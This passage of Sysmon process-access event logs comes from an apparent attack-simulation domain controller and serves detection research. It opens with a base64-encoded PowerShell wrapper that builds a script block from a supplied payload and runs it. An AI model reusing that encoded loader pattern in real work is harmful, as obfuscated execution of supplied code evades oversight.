EEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9240,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010A11D1200}\r\nSourceProcessId: 4988\r\nSourceThreadId: 4180\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-00106C1E1200}\r\nTargetProcessId: 1360\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010A11D1200}","SourceProcessId":"4988","SourceThreadId":"4180","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-00106C1E1200}","TargetProcessId":"1360","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9241,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-00106C1E1200}\r\nTargetProcessId: 1360\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-00106C1E1200}","TargetProcessId":"1360","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9242,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9243,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9244,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9245,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9246,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9247,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 